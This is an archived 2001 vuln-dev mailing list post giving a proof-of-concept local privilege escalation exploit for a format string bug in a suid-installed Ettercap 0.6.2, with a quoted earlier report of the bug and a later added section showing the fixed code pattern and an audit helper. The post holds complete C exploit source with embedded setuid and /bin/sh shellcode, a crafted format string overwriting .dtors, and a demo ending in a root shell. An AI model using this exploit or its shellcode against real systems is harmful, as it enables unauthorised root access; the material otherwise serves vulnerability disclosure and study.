Vulnerability Development mailing list archives
Proof of concept for the format bug in Ettercap 0.6.2
From: BAILLEUX Christophe <cb () t-online fr>
Date: Wed, 5 Dec 2001 12:25:00 +0100 (CET)
Firstly, let's retrieve the address of the section .dtors:

cb@tshaw$ objdump -s -j .dtors /usr/local/sbin/ettercap

/usr/local/sbin/ettercap:     file format elf32-i386

Contents of section .dtors:
 8119a70 ffffffff 00000000                    ........
cb@tshaw$

So the fmt string is composed of:

- "000" for alignment.
- "\x74\x9a\x11\x08\x76\x9a\x11\x08" provides the addresses where we expect to write (here .dtors + 4 -- 0x8119a74.)
- "%.49119x%16$hn%.16145x%15$hn" ret addr in shellcode.

This format string was built using fmtbuilder:
http://minimum.inria.fr/~raynal/index.php3?page=501

---- ettercap-exp.c ----
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */

int main()
{
    char buf[1024];
    char shellcode[] =
        /* setuid(0) */
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
        /* Aleph 1 shellcode */
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    char *fmt = "000\x74\x9a\x11\x08\x76\x9a\x11\x08%.49119x%16$hn%.16145x%15$hn";

    memset(buf, 0x90, 1024);
    memcpy(buf + 1024 - strlen(shellcode), shellcode, strlen(shellcode));
    setenv("SHELLCODE", buf, 1);
    /* the argument list of execl() must end with a null pointer */
    execl("/usr/local/sbin/ettercap", "ettercap", fmt, (char *)0);
    return 0;
}
---- ettercap-exp.c ----

Demo:

This demo is made with a suid root version.

cb@tshaw$ gcc -o ettercap-exp ettercap-exp.c
cb@tshaw$ ./ettercap-exp

ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...
may the packets be with you...

Invalid host address 000tv00000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000
....snip....
0000000000000000000000000000000000000000000000081020c0 !!

sh-2.04# id
uid=0(root) groups=100(users)

Best regards,
--
Christophe Bailleux - Network & System Security Engineer
Club-Internet / T-Online France
Voice:+33-(0)1-5545-4789 - mailto:cb () t-online fr

On Tue, 4 Dec 2001, Blue Boar wrote:
> Gobbles sent another post to vuln-dev today, which was rejected due to personal attacks in their note. I want to check out their claim, however. If you want to see their original posting, it's on their web site like the others, I'm sure. It includes a claimed exploit, which cannot be posted due to their wishes that it not be separated from the advisory. If someone wants to write an independent exploit, I'd be happy to post that, provided it follows the list rules, of course.
>
> Here's the basic problem:
>
> ettercap %x%x%x%x%x%x%x
>
> ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...
> may the packets be with you...
>
> Invalid host address 807a0ef807a0e900bffffb71bffff850805ad52 !!
>
> Gobbles' point is that there is an option to configure it suid, so this could be exploitable when that is used. Why someone would want a packet capture program to be used by non-priv users.. Well, I'm sure there's a good reason somewhere in the world. Is anyone using it that way? Are there OS distributions that come with Ettercap installed by default? And, of course, is it suid? (I can't imagine it would be.)
>
> The workaround is obvious, don't run it suid or allow remote users who do not already have a shell to execute it with a command-line parameter (such as via a web interface.)
>
> BB
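The bug class behind both posts above (the "Invalid host address" text reaching a printf-style call as its format string), shown as an added example that is not ettercap's code and not the poster's exploit: the vulnerable pattern next to its fix, plus an audit helper that flags conversion directives in text that is about to be used as a format. Function names and the message wording are assumptions for illustration.

```c
/* Added example: the bug class in this thread, as the vulnerable pattern next
 * to its fix plus an audit check. Function names and the message text are
 * assumptions for illustration, not ettercap's own code. */
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern: text of external origin ends up as the format argument,
 * so "%x" reads stack words (the hex seen in both posts) and "%n" writes. */
static int invalid_host_vulnerable(char *out, size_t n, const char *host)
{
    char msg[256];
    snprintf(msg, sizeof msg, "Invalid host address %s !!", host);
    return snprintf(out, n, msg);   /* gcc -Wformat-security flags this line */
}

/* Fixed pattern: the format is a constant and the user text is a "%s"
 * argument, so any '%' in it is copied literally and never interpreted. */
static int invalid_host_fixed(char *out, size_t n, const char *host)
{
    return snprintf(out, n, "Invalid host address %s !!", host);
}

/* Audit/detection helper: count conversion directives in a string that is
 * about to be used as a format, and report whether any of them is "%n".
 * A non-zero count for externally supplied text is a defect; "%n" means
 * the caller has handed out a memory-write primitive. */
static int count_directives(const char *s, int *has_n)
{
    int count = 0;
    *has_n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {          /* "%%" is a literal percent sign */
            s++;
            continue;
        }
        count++;
        /* skip flags, width, precision, positional "$" and length modifiers */
        const char *p = s + 1;
        while (*p && strchr("0123456789$.-+ #hlLqjzt", *p))
            p++;
        if (*p == 'n')
            *has_n = 1;
    }
    return count;
}
```

Building with `gcc -Wformat -Wformat-security` reports the non-literal format in the vulnerable function at compile time, which is the cheapest check for this bug class in a C code base.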
Current thread:
- Potential hole in Ettercap 0.6.2 Blue Boar (Dec 04)
- Re: Potential hole in Ettercap 0.6.2 Michal Zalewski (Dec 04)
- Re: Potential hole in Ettercap 0.6.2 Blue Boar (Dec 04)
- Re: Potential hole in Ettercap 0.6.2 Jonathan Bloomquist (Dec 04)
- Proof of concept for the format bug in Ettercap 0.6.2 BAILLEUX Christophe (Dec 05)
- <Possible follow-ups>
- Re:Potential hole in Ettercap 0.6.2 w1re p4ir (Dec 04)
- Re:Potential hole in Ettercap 0.6.2 ALoR (Dec 04)
- Re:Potential hole in Ettercap 0.6.2 Jose Nazario (Dec 04)
- Message not available
- Re:Potential hole in Ettercap 0.6.2 ALoR (Dec 04)
- Re:Potential hole in Ettercap 0.6.2 ALoR (Dec 04)
- Re: Potential hole in Ettercap 0.6.2 Michal Zalewski (Dec 04)
- Re: Potential hole in Ettercap 0.6.2 Melsa (Dec 04)